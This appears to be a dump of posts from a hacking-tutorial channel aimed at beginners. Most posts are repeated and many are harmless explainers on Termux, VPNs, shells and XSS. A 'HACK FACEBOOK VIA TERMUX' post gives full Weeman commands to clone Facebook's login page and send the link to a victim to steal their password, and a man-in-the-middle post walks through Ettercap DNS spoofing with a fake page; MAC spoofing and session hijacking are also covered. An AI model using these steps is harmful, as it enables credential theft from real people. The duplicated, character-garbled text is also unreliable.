Password Spraying Outlook Web Access_ Remote Shell.pdf
617.7 KB
A well written tutorial- #forbeginers Password Spraying Outlook Web Access_ Remote Shell
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦What are all termux addons ?
#ForBeginers
<> Addons
Some extra features available. You can add them by installing addons:
1) Termux:API β Access Android and Chrome hardware features.
2) Termux:Boot β Run script(s) when your device boots.
3) Termux:Float β Run in a floating window.
4) Termux:Styling β Have color schemes and powerline-ready fonts customize the appearance of the terminal.
5) Termux:Task β An easy way to call Termux executables from Tasker and compatible apps.
6) Termux:Widget β Start small scriptlets from the home screen.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦What are all termux addons ?
#ForBeginers
<> Addons
Some extra features available. You can add them by installing addons:
1) Termux:API β Access Android and Chrome hardware features.
2) Termux:Boot β Run script(s) when your device boots.
3) Termux:Float β Run in a floating window.
4) Termux:Styling β Have color schemes and powerline-ready fonts customize the appearance of the terminal.
5) Termux:Task β An easy way to call Termux executables from Tasker and compatible apps.
6) Termux:Widget β Start small scriptlets from the home screen.
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Many Hackers asking what is difference between termux & Cmd or terminal apk on android & termux so popular
#ForBeginers
> forget about python and scripting let's take a look to termux features not avaible for Terminal apk app :))
1) Secure. Access remote servers using the ssh client from OpenSSH. Termux combines standard packages with accurate terminal emulation in a beautiful open source solution.
2) Feature packed. Take your pick between Bash, fish or Zsh and nano, Emacs or Vim. Grep through your SMS inbox.
3) Access API endpoints with curl and use rsync to store backups of your contact list on a remote server.
4) Customizable. Install what you want through the APT package management system known from Debian and Ubuntu GNU/Linux. Why not start with installing Git and syncing your dotfiles?
5) Explorable. Have you ever sat on a bus and wondered exactly which arguments tar accepts? Packages available in Termux are the same as those on Mac and Linux β install man pages on your phone and read them in one session while experimenting with them in another.
6) With batteries included. Can you imagine a more powerful yet elegant pocket calculator than a readline-powered Python console? Up-to-date versions of Perl, Python, Ruby and Node.js are all available.
7) Ready to scale up. Connect a Bluetooth keyboard and hook up your device to an external display if you need to β It supports keyboard shortcuts and has full mouse support.
8) Tinkerable. Develop by compiling C files with Clang and build your own projects with CMake and pkg-config. Both GDB and strace are available if you get stuck and need to debug.
enjoyβ€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
βtermux features
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Many Hackers asking what is difference between termux & Cmd or terminal apk on android & termux so popular
#ForBeginers
> forget about python and scripting let's take a look to termux features not avaible for Terminal apk app :))
1) Secure. Access remote servers using the ssh client from OpenSSH. Termux combines standard packages with accurate terminal emulation in a beautiful open source solution.
2) Feature packed. Take your pick between Bash, fish or Zsh and nano, Emacs or Vim. Grep through your SMS inbox.
3) Access API endpoints with curl and use rsync to store backups of your contact list on a remote server.
4) Customizable. Install what you want through the APT package management system known from Debian and Ubuntu GNU/Linux. Why not start with installing Git and syncing your dotfiles?
5) Explorable. Have you ever sat on a bus and wondered exactly which arguments tar accepts? Packages available in Termux are the same as those on Mac and Linux β install man pages on your phone and read them in one session while experimenting with them in another.
6) With batteries included. Can you imagine a more powerful yet elegant pocket calculator than a readline-powered Python console? Up-to-date versions of Perl, Python, Ruby and Node.js are all available.
7) Ready to scale up. Connect a Bluetooth keyboard and hook up your device to an external display if you need to β It supports keyboard shortcuts and has full mouse support.
8) Tinkerable. Develop by compiling C files with Clang and build your own projects with CMake and pkg-config. Both GDB and strace are available if you get stuck and need to debug.
enjoyβ€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
βtermux features
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Decryption and encryption for beginers :
#forbeginers
1) Encryption and decryption of software is a fascinating field of research, which can be closely integrated with almost any computer technology-cryptography, programming languages, operating systems, and data structures. Without encryption technology,
2) any network security is empty talk, and the application of encryption runs through the entire network security learning process.
3) Let's first understand the program in the computer. Programs written in high-level languages will be compiled into machine language and executed on the CPU, such as Visual C++. Since machine language and assembly language have a one-to-one correspondence, machine language can be converted into assembly language. This process is called disassembly.
The assembly language may be more readable, so you can analyze the program flow and analyze its functions. This process is decryption (commonly known as cracking). In other words, the basis of decryption is built on the level of assembly language, so friends who want to get involved in this field must learn assembly language well.
4) After you have learned the assembly, it is recommended to master Win32 programming.Learning to decrypt and encrypt is very tiring, it takes a lot of time, and often hits the wall. It is very common to make no progress for three to five days. There is no secret other than diligence + perseverance. But mastering this technology can improve one's own debugging skills through tracking software, understand others' program ideas, and write better programs.
E N J O Y β€οΈππ»
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Decryption and encryption for beginers :
#forbeginers
1) Encryption and decryption of software is a fascinating field of research, which can be closely integrated with almost any computer technology-cryptography, programming languages, operating systems, and data structures. Without encryption technology,
2) any network security is empty talk, and the application of encryption runs through the entire network security learning process.
3) Let's first understand the program in the computer. Programs written in high-level languages will be compiled into machine language and executed on the CPU, such as Visual C++. Since machine language and assembly language have a one-to-one correspondence, machine language can be converted into assembly language. This process is called disassembly.
The assembly language may be more readable, so you can analyze the program flow and analyze its functions. This process is decryption (commonly known as cracking). In other words, the basis of decryption is built on the level of assembly language, so friends who want to get involved in this field must learn assembly language well.
4) After you have learned the assembly, it is recommended to master Win32 programming.Learning to decrypt and encrypt is very tiring, it takes a lot of time, and often hits the wall. It is very common to make no progress for three to five days. There is no secret other than diligence + perseverance. But mastering this technology can improve one's own debugging skills through tracking software, understand others' program ideas, and write better programs.
E N J O Y β€οΈππ»
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦#forbeginers Google AdSense allows modification of Western Unionβs phonetic name
> In the Google AdSense account settings, our pinyin name is always set upside down for us. According to the custom of foreign countries, the surname is always placed after the name, so we always hit a wall when we withdraw money in Western Union. According to many people's feedback, GG finally made today's decision to allow the modification of Western Union's phonetic name.
> The following is the content announced on the GG official website: Since the opening of Western Union, many publishers need to write us an email to modify the pinyin name to receive payment. In order to facilitate the smooth withdrawal of funds from publishers, we are happy to inform you that now you can directly modify the pinyin name in your account!
The modification steps are very simple:
1οΈβ£ Log in to your AdSense account and click on the My Account link.
2οΈβ£ Click the edit link next to the payment details.
3οΈβ£Select Set up Western Union Quick Cash and click Continue.
Then you will see the page to modify the pinyin name: you only need to fill in the pinyin of your name in the corresponding box, the case of the pinyin has no effect, but do not add spaces between the names.
@undercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦#forbeginers Google AdSense allows modification of Western Unionβs phonetic name
> In the Google AdSense account settings, our pinyin name is always set upside down for us. According to the custom of foreign countries, the surname is always placed after the name, so we always hit a wall when we withdraw money in Western Union. According to many people's feedback, GG finally made today's decision to allow the modification of Western Union's phonetic name.
> The following is the content announced on the GG official website: Since the opening of Western Union, many publishers need to write us an email to modify the pinyin name to receive payment. In order to facilitate the smooth withdrawal of funds from publishers, we are happy to inform you that now you can directly modify the pinyin name in your account!
The modification steps are very simple:
1οΈβ£ Log in to your AdSense account and click on the My Account link.
2οΈβ£ Click the edit link next to the payment details.
3οΈβ£Select Set up Western Union Quick Cash and click Continue.
Then you will see the page to modify the pinyin name: you only need to fill in the pinyin of your name in the corresponding box, the case of the pinyin has no effect, but do not add spaces between the names.
@undercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦another methode #forbeginers how can we protect the security of shared folders in the local area network? This requires the following means:
When setting access permissions for shared folders, set important shared files as read-only.
1) Most of the time, users only need to view or copy the shared file, and often do not directly modify the shared folder. However, for convenience, some employees directly share a folder and file in a readable and writable manner. This is very dangerous.
2) On the one hand, these unrestricted shared file homes and shared files have become carriers of virus transmission. During my work, I discovered that some users do not have permission restrictions when sharing files. After some time, I went to look at the shared file again, and found that there were traces of viruses or Trojan horses in some shared files or shared folders.
3) It turns out that because this shared folder has write permissions, how other users open this file, if there is a virus or Trojan horse in this computer, it will be infected to this shared folder. In this way, other computers that access this shared folder are also caught. It can be seen that the shared folders without protection measures and the shared files inside have become a good carrier for virus transmission.
4) On the other hand, when the data is changed illegally, it is difficult to find out who is playing the prank. Although the relevant log information can be used to query who has accessed the shared file and whether any changes have been made. However, based on this information alone, it is impossible to know what changes the user made to this shared folder.
5) Sometimes, when we open a shared file, we accidentally press a space bar or a character key, accidentally overwrite a word, etc. These situations are often encountered in actual work. Sometimes, even if he finds the responsible person, he doesn't know what has been changed. Therefore, when the shared file is set to be writable, it is difficult to prevent employees from changing it intentionally or unintentionally.
6) Third, if files are shared in a writable way, the unity of data may not be guaranteed. For example, the personnel department has shared an attendance file in a readable and writable manner. At this time, if the financial department modifies this document, the personnel department does not know. Because the financial staff may forget to tell the personnel department, at this time, the data between the two departments will be inconsistent, which may cause some unnecessary troubles.
>Moreover, since there is no relevant evidence, no one can tell who is right and who is wrong.
7) In order to solve these problems, I suggest that corporate users, when sharing folders, it is best to set the permissions of the folder to read-only. If this shared folder sometimes needs to save files in this folder by other users, it cannot be set as read-only. Then we can also set the files in the shared folder as read-only.
> In this case, because the folders are read-only, viruses and Trojan horses cannot infect these folders, thereby avoiding being a source of contamination for spreading viruses; moreover, it can also prevent unauthorized changes by users, which may lead to inconsistent data. and many more.
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦another methode #forbeginers how can we protect the security of shared folders in the local area network? This requires the following means:
When setting access permissions for shared folders, set important shared files as read-only.
1) Most of the time, users only need to view or copy the shared file, and often do not directly modify the shared folder. However, for convenience, some employees directly share a folder and file in a readable and writable manner. This is very dangerous.
2) On the one hand, these unrestricted shared file homes and shared files have become carriers of virus transmission. During my work, I discovered that some users do not have permission restrictions when sharing files. After some time, I went to look at the shared file again, and found that there were traces of viruses or Trojan horses in some shared files or shared folders.
3) It turns out that because this shared folder has write permissions, how other users open this file, if there is a virus or Trojan horse in this computer, it will be infected to this shared folder. In this way, other computers that access this shared folder are also caught. It can be seen that the shared folders without protection measures and the shared files inside have become a good carrier for virus transmission.
4) On the other hand, when the data is changed illegally, it is difficult to find out who is playing the prank. Although the relevant log information can be used to query who has accessed the shared file and whether any changes have been made. However, based on this information alone, it is impossible to know what changes the user made to this shared folder.
5) Sometimes, when we open a shared file, we accidentally press a space bar or a character key, accidentally overwrite a word, etc. These situations are often encountered in actual work. Sometimes, even if he finds the responsible person, he doesn't know what has been changed. Therefore, when the shared file is set to be writable, it is difficult to prevent employees from changing it intentionally or unintentionally.
6) Third, if files are shared in a writable way, the unity of data may not be guaranteed. For example, the personnel department has shared an attendance file in a readable and writable manner. At this time, if the financial department modifies this document, the personnel department does not know. Because the financial staff may forget to tell the personnel department, at this time, the data between the two departments will be inconsistent, which may cause some unnecessary troubles.
>Moreover, since there is no relevant evidence, no one can tell who is right and who is wrong.
7) In order to solve these problems, I suggest that corporate users, when sharing folders, it is best to set the permissions of the folder to read-only. If this shared folder sometimes needs to save files in this folder by other users, it cannot be set as read-only. Then we can also set the files in the shared folder as read-only.
> In this case, because the folders are read-only, viruses and Trojan horses cannot infect these folders, thereby avoiding being a source of contamination for spreading viruses; moreover, it can also prevent unauthorized changes by users, which may lead to inconsistent data. and many more.
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦TOR VS VPN, VPN AND TOR, WHICH ONE IS BETTER :
#forBeginers
If your goal is to encrypt the transmitted data so that your Internet provider could not analyze it, then both Tor and your VPN, which you yourself set up , can come up with ! I would not recommend using any third-party VPNs, since their owner can see all the transmitted traffic + client IP (that is, your IP address). If you use a third-party VPN service, then you are guaranteed to get a spyware who, at a minimum, also knows your real IP address! If this is a paid VPN, then it is absolutely not suitable for anonymity, since the VPN service does not only know your IP and has access to all transmitted data, then it knows who you are by your payment details.
1) The self-configured OpenVPN allows you to encrypt the transmitted traffic and integrate your devices into a virtual private network. You can also hide your real IP address and bypass site blocking. But for anonymity, this option is not suitable, because for the operation of OpenVPN you need to rent a VPS, for which you have to pay. Although if you use cryptocurrency or other anonymous methods for payment, OpenVPN will help you to be anonymous.
2) Using a single proxy has the same disadvantages as a VPN: the eavesdropper + proxy service knows your real IP address. An additional drawback in the absence of encryption is that your ISP can still analyze your traffic and even block access to websites.
3) The situation with IP concealment improves if a proxy chain is used, because (depending on the settings), each next proxy knows the IP address of the previous node (always) and the IP address of 1 node before the previous one (sometimes). If we consider that traffic is not encrypted at any stage, and a certain part of public proxies is just honeypots (intended for the exploitation of users), then the proxy option is not the best way to ensure anonymity.
enjoyβ€οΈππ»
#wikiresources
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦TOR VS VPN, VPN AND TOR, WHICH ONE IS BETTER :
#forBeginers
If your goal is to encrypt the transmitted data so that your Internet provider could not analyze it, then both Tor and your VPN, which you yourself set up , can come up with ! I would not recommend using any third-party VPNs, since their owner can see all the transmitted traffic + client IP (that is, your IP address). If you use a third-party VPN service, then you are guaranteed to get a spyware who, at a minimum, also knows your real IP address! If this is a paid VPN, then it is absolutely not suitable for anonymity, since the VPN service does not only know your IP and has access to all transmitted data, then it knows who you are by your payment details.
1) The self-configured OpenVPN allows you to encrypt the transmitted traffic and integrate your devices into a virtual private network. You can also hide your real IP address and bypass site blocking. But for anonymity, this option is not suitable, because for the operation of OpenVPN you need to rent a VPS, for which you have to pay. Although if you use cryptocurrency or other anonymous methods for payment, OpenVPN will help you to be anonymous.
2) Using a single proxy has the same disadvantages as a VPN: the eavesdropper + proxy service knows your real IP address. An additional drawback in the absence of encryption is that your ISP can still analyze your traffic and even block access to websites.
3) The situation with IP concealment improves if a proxy chain is used, because (depending on the settings), each next proxy knows the IP address of the previous node (always) and the IP address of 1 node before the previous one (sometimes). If we consider that traffic is not encrypted at any stage, and a certain part of public proxies is just honeypots (intended for the exploitation of users), then the proxy option is not the best way to ensure anonymity.
enjoyβ€οΈππ»
#wikiresources
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Session Hijacking Attacks :
#forbeginers
- Session hijacking attacks exploit a valid web session to gain access to a computer network or system. Session hijacking is also informally known as cookie hijacking.
- Since there are several TCP connections involved in HTTP networking, there is often a method involved in the identification of web users. Whether a particular method is suitable is determined by a session token sent by a web server to the userβs browser following successful authentication. A session ID or session token is a string of varying lengths given to a visitor upon their first visit to a site. There are many ways to incorporate a session ID; it can be worked into the URL or the header of the https request received, or stored as a cookie.
S p e c i f i c a l l y :
1) Most browser sessions and web applications are susceptible to session ID attacks, though most can be used to hijack just about any system out there.
2) Session hijacking attacks, or cookie hijacking attacks, steal or imitate a session token to gain access to a system.
M E T H O D E S :
There are several different ways to compromise a session token:
1) By predicting a weak session token
2) Through session sniffing
3) By means of client-side attacks (XSS, malicious JavaScript Codes, Trojans, etc.)
4) Through man-in-the-middle (MITM) attacks (phishing, etc.)
ubuntu forum
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Session Hijacking Attacks :
#forbeginers
- Session hijacking attacks exploit a valid web session to gain access to a computer network or system. Session hijacking is also informally known as cookie hijacking.
- Since there are several TCP connections involved in HTTP networking, there is often a method involved in the identification of web users. Whether a particular method is suitable is determined by a session token sent by a web server to the userβs browser following successful authentication. A session ID or session token is a string of varying lengths given to a visitor upon their first visit to a site. There are many ways to incorporate a session ID; it can be worked into the URL or the header of the https request received, or stored as a cookie.
S p e c i f i c a l l y :
1) Most browser sessions and web applications are susceptible to session ID attacks, though most can be used to hijack just about any system out there.
2) Session hijacking attacks, or cookie hijacking attacks, steal or imitate a session token to gain access to a system.
M E T H O D E S :
There are several different ways to compromise a session token:
1) By predicting a weak session token
2) Through session sniffing
3) By means of client-side attacks (XSS, malicious JavaScript Codes, Trojans, etc.)
4) Through man-in-the-middle (MITM) attacks (phishing, etc.)
ubuntu forum
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦HACK FACEBOOK VIA TERMUX :
#ForBeginers :
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) apt update && upgrade
Now give permission to Termux to access your memory
So type below command
2) termux-setup-storage
Then type this command to install python2
3) pkg install python2
During installation of python2 you will be asked " Termux will use some space"
4) Just type Y and hit enter
Now you have to install git, for that type this command
5) pkg install git
After successfully installing git, type below command to
6) install Weeman
7) git clone https://github.com/evait-security/weeman.git
After that type this command
8) cd weeman && ls
Now you have to type below command to run Weeman on Python
9) python2 weeman.py
Now you will see the Weeman user interface, its time to set all the necessary command
firstly you have to find your IP address, it is important so that you can find your IP address through termux
Just open a new tab on termux and type below command to see your IP
10) ifconfig
11) Now you got your IP address, now type below commands to get started
set url http://facebook.com
set action_url https://facebook.com
set port 8080
Note that, in this tutorial, we are going to do phishing for Facebook, inorder to hack facebook using Termux, so we have typed set url to Facebook.com.
12) How To Hack Facebook Using Termux (Weeman)
If you're targeting Facebook mobile users then set the url to m.facebook.com
Eg: set url http://m.facebook.com
Now finally type this command
run
Setting up weeman in termux
that's all you have successfully executed all the commands to hack Facebook
Now you have to share your IP with your victim to get his username and password
12) so send a link to your victim as http://Your_IP:8080
Eg: http://127.0.0.1:8080
#forbeginers
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦HACK FACEBOOK VIA TERMUX :
#ForBeginers :
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) apt update && upgrade
Now give permission to Termux to access your memory
So type below command
2) termux-setup-storage
Then type this command to install python2
3) pkg install python2
During installation of python2 you will be asked " Termux will use some space"
4) Just type Y and hit enter
Now you have to install git, for that type this command
5) pkg install git
After successfully installing git, type below command to
6) install Weeman
7) git clone https://github.com/evait-security/weeman.git
After that type this command
8) cd weeman && ls
Now you have to type below command to run Weeman on Python
9) python2 weeman.py
Now you will see the Weeman user interface, its time to set all the necessary command
firstly you have to find your IP address, it is important so that you can find your IP address through termux
Just open a new tab on termux and type below command to see your IP
10) ifconfig
11) Now you got your IP address, now type below commands to get started
set url http://facebook.com
set action_url https://facebook.com
set port 8080
Note that, in this tutorial, we are going to do phishing for Facebook, inorder to hack facebook using Termux, so we have typed set url to Facebook.com.
12) How To Hack Facebook Using Termux (Weeman)
If you're targeting Facebook mobile users then set the url to m.facebook.com
Eg: set url http://m.facebook.com
Now finally type this command
run
Setting up weeman in termux
that's all you have successfully executed all the commands to hack Facebook
Now you have to share your IP with your victim to get his username and password
12) so send a link to your victim as http://Your_IP:8080
Eg: http://127.0.0.1:8080
#forbeginers
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - evait-security/weeman: HTTP server for phishing in python
HTTP server for phishing in python. Contribute to evait-security/weeman development by creating an account on GitHub.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦#ForBeginers What is Cross Site Scripting (XSS)? & How it Work's ?
1) Cross-site scripting (XSS) is a type of cyberattack in which malicious scripts are injected into trusted and trusted sites.
2) Cross-site scripting attacks are possible in HTML, Flash, ActiveX and CSS. However, JavaScript is the most frequent target of cybercriminals as it plays an important role in most web browsing.
3) JavaScript is a programming language that allows you to implement complex functionality on your website. Most of the large and interactive websites on the Internet have been built with JavaScript. βYou can develop interactive features, games or add additional features to better promote your products,β says Domantas Gudelyauskas, marketing manager for the Zyro project.
4) JavaScript is so popular in the web community because it allows you to do almost anything on a web page. And that's when it becomes problematic. Cybercriminals can use JavaScript to log into your web pages and insert malicious scripts.
π¦How does cross-site scripting work?
Cybercriminals can perform XSS attacks on WordPress websites in two ways. They can either use user input or bypass policies of the same origin. Let's take a look at both methods to better understand cross-site scripting.
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦#ForBeginers What is Cross Site Scripting (XSS)? & How it Work's ?
1) Cross-site scripting (XSS) is a type of cyberattack in which malicious scripts are injected into trusted and trusted sites.
2) Cross-site scripting attacks are possible in HTML, Flash, ActiveX and CSS. However, JavaScript is the most frequent target of cybercriminals as it plays an important role in most web browsing.
3) JavaScript is a programming language that allows you to implement complex functionality on your website. Most of the large and interactive websites on the Internet have been built with JavaScript. βYou can develop interactive features, games or add additional features to better promote your products,β says Domantas Gudelyauskas, marketing manager for the Zyro project.
4) JavaScript is so popular in the web community because it allows you to do almost anything on a web page. And that's when it becomes problematic. Cybercriminals can use JavaScript to log into your web pages and insert malicious scripts.
π¦How does cross-site scripting work?
Cybercriminals can perform XSS attacks on WordPress websites in two ways. They can either use user input or bypass policies of the same origin. Let's take a look at both methods to better understand cross-site scripting.
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦#ForBeginers What is Cross Site Scripting (XSS)? & How it Work's ?
1) Cross-site scripting (XSS) is a type of cyberattack in which malicious scripts are injected into trusted and trusted sites.
2) Cross-site scripting attacks are possible in HTML, Flash, ActiveX and CSS. However, JavaScript is the most frequent target of cybercriminals as it plays an important role in most web browsing.
3) JavaScript is a programming language that allows you to implement complex functionality on your website. Most of the large and interactive websites on the Internet have been built with JavaScript. βYou can develop interactive features, games or add additional features to better promote your products,β says Domantas Gudelyauskas, marketing manager for the Zyro project.
4) JavaScript is so popular in the web community because it allows you to do almost anything on a web page. And that's when it becomes problematic. Cybercriminals can use JavaScript to log into your web pages and insert malicious scripts.
π¦How does cross-site scripting work?
Cybercriminals can perform XSS attacks on WordPress websites in two ways. They can either use user input or bypass policies of the same origin. Let's take a look at both methods to better understand cross-site scripting.
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦#ForBeginers What is Cross Site Scripting (XSS)? & How it Work's ?
1) Cross-site scripting (XSS) is a type of cyberattack in which malicious scripts are injected into trusted and trusted sites.
2) Cross-site scripting attacks are possible in HTML, Flash, ActiveX and CSS. However, JavaScript is the most frequent target of cybercriminals as it plays an important role in most web browsing.
3) JavaScript is a programming language that allows you to implement complex functionality on your website. Most of the large and interactive websites on the Internet have been built with JavaScript. βYou can develop interactive features, games or add additional features to better promote your products,β says Domantas Gudelyauskas, marketing manager for the Zyro project.
4) JavaScript is so popular in the web community because it allows you to do almost anything on a web page. And that's when it becomes problematic. Cybercriminals can use JavaScript to log into your web pages and insert malicious scripts.
π¦How does cross-site scripting work?
Cybercriminals can perform XSS attacks on WordPress websites in two ways. They can either use user input or bypass policies of the same origin. Let's take a look at both methods to better understand cross-site scripting.
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦How to Change the MAC Address
#forBeginers
In a Kali Linux, it is very easy to spoof the MAC address. This can be done by opening the terminal window in the Kali Linux system. Initially, we will check all of the adapters that are using the ifconfig command, as shown:
1) $ sudo ifconfig
2) $ sudo ifconfig eth0 down
3) Next, we will change the MAC address. This can be done by entering the following command:
$ sudo macchanger -r eth0
4) In this command, the -r flag is used to change the current MAC address to the random MAC address in the network interface of eth0.
In the screenshot above, note that the MAC address has been successfully spoofed. Now, we will turn on the network interface again.
5) This can be done by entering the following command:
$ sudo ifconfig eth0 up
6) Next, it is necessary to check the MAC address again with the help of the ifconfig command:
$ sudo ifconfig
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦How to Change the MAC Address
#forBeginers
In a Kali Linux, it is very easy to spoof the MAC address. This can be done by opening the terminal window in the Kali Linux system. Initially, we will check all of the adapters that are using the ifconfig command, as shown:
1) $ sudo ifconfig
2) $ sudo ifconfig eth0 down
3) Next, we will change the MAC address. This can be done by entering the following command:
$ sudo macchanger -r eth0
4) In this command, the -r flag is used to change the current MAC address to the random MAC address in the network interface of eth0.
In the screenshot above, note that the MAC address has been successfully spoofed. Now, we will turn on the network interface again.
5) This can be done by entering the following command:
$ sudo ifconfig eth0 up
6) Next, it is necessary to check the MAC address again with the help of the ifconfig command:
$ sudo ifconfig
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from WEB UNDERCODE - PRIVATE
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦MAN-IN-MIDDLE ATTACK #ForBeginers :
π»π΄π 'π π π π°π π :
Launch the Parrot or Kali Linux machine to get started.
Set up the DNS config file in Ettercap
1) Setup the command terminal and change the DNS configuration of the Ettercap by typing the following syntax into the editor of your choice.
$ gedit /etc/ettercap/etter.dns
2) You will be displayed the DNS configuration file.
3) Next, youβll need to type your address in the terminal
>* a 10.0.2.15
4) Check your IP address by typing ifconfig in a new terminal if you donβt already know what it is.
To save changes, press ctrl+x, and press (y) bottom.
Prepare the Apache server
5) Now, we will move our fake security page to a location on the Apache server and run it. You will need to move your fake page to this apache directory.
6) Run the following command to format the HTML directory:
$ Rm /Var/Www/Html/*
7) Next up, youβll need to save your fake security page and upload it to the directory weβve mentioned. Type the following in the terminal to start the upload:
$ mv /root/Desktop/fake.html /var/www/html
8) Now fire up the Apache Server with the following command:
$ sudo service apache2 start
9) Youβll see that the server has successfully launched.
Spoofing with Ettercap addon
Now weβll see how Ettercap would come into play. We will be DNS spoofing with Ettercap.
10) Launch the app by typing:
$ettercap -G
source linux forum
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦MAN-IN-MIDDLE ATTACK #ForBeginers :
π»π΄π 'π π π π°π π :
Launch the Parrot or Kali Linux machine to get started.
Set up the DNS config file in Ettercap
1) Setup the command terminal and change the DNS configuration of the Ettercap by typing the following syntax into the editor of your choice.
$ gedit /etc/ettercap/etter.dns
2) You will be displayed the DNS configuration file.
3) Next, youβll need to type your address in the terminal
>* a 10.0.2.15
4) Check your IP address by typing ifconfig in a new terminal if you donβt already know what it is.
To save changes, press ctrl+x, and press (y) bottom.
Prepare the Apache server
5) Now, we will move our fake security page to a location on the Apache server and run it. You will need to move your fake page to this apache directory.
6) Run the following command to format the HTML directory:
$ Rm /Var/Www/Html/*
7) Next up, youβll need to save your fake security page and upload it to the directory weβve mentioned. Type the following in the terminal to start the upload:
$ mv /root/Desktop/fake.html /var/www/html
8) Now fire up the Apache Server with the following command:
$ sudo service apache2 start
9) Youβll see that the server has successfully launched.
Spoofing with Ettercap addon
Now weβll see how Ettercap would come into play. We will be DNS spoofing with Ettercap.
10) Launch the app by typing:
$ettercap -G
source linux forum
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦What is Shell? Understand the concept of Shell in 1 minute! #ForBeginers
> The operating systems we use now (Windows, Mac OS, Android , iOS, etc.) are all with a graphical interface, simple and intuitive, easy to use, for professional users (programmers, network managers, etc.) and ordinary users (housewives, elderly, etc.) ) Are very applicable; the popularity of computers is inseparable from the graphical interface.
> However, in the early days of computers, there was no graphical interface. We could only control the computer through commands one by one. There are hundreds of these commands, not to mention that it is very difficult to remember these commands. "Black screen" itself is a boring thing; computers at this time are far from being cool and popular, and only professionals can use it.
> the only thing that can control the computer hardware (CPU, memory, display, etc.) is the kernel of the operating system. The graphical interface and the command line are just a bridge between the user and the kernel.
If you do not understand the role of the operating system, please go to " What is an operating system ".
Due to security, complexity, cumbersome and other reasons, users cannot directly access the kernel (not necessary), and need to develop another program to allow users to directly use this program; the function of the program is to receive user operations (click on the icon, enter commands) , And perform simple processing, and then pass to the kernel, so that users can indirectly use the operating system kernel. You see, adding a layer of "agent" between the user and the kernel can not only simplify the user's operation, but also ensure the security of the kernel. Why not?
> The user interface and command line are this separately developed program, which is the "agent". Under Linux, this command line program is called Shell .
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦What is Shell? Understand the concept of Shell in 1 minute! #ForBeginers
> The operating systems we use now (Windows, Mac OS, Android , iOS, etc.) are all with a graphical interface, simple and intuitive, easy to use, for professional users (programmers, network managers, etc.) and ordinary users (housewives, elderly, etc.) ) Are very applicable; the popularity of computers is inseparable from the graphical interface.
> However, in the early days of computers, there was no graphical interface. We could only control the computer through commands one by one. There are hundreds of these commands, not to mention that it is very difficult to remember these commands. "Black screen" itself is a boring thing; computers at this time are far from being cool and popular, and only professionals can use it.
> the only thing that can control the computer hardware (CPU, memory, display, etc.) is the kernel of the operating system. The graphical interface and the command line are just a bridge between the user and the kernel.
If you do not understand the role of the operating system, please go to " What is an operating system ".
Due to security, complexity, cumbersome and other reasons, users cannot directly access the kernel (not necessary), and need to develop another program to allow users to directly use this program; the function of the program is to receive user operations (click on the icon, enter commands) , And perform simple processing, and then pass to the kernel, so that users can indirectly use the operating system kernel. You see, adding a layer of "agent" between the user and the kernel can not only simplify the user's operation, but also ensure the security of the kernel. Why not?
> The user interface and command line are this separately developed program, which is the "agent". Under Linux, this command line program is called Shell .
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
UNDERCODE COMMUNITY
BURPSUITE FULL PRACTICAL.pdf
COMMANDS + PICTURES + EXAMPLES #FORBeginers
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦why a beginer should Learn multiple programming languages ?
#forBeginers
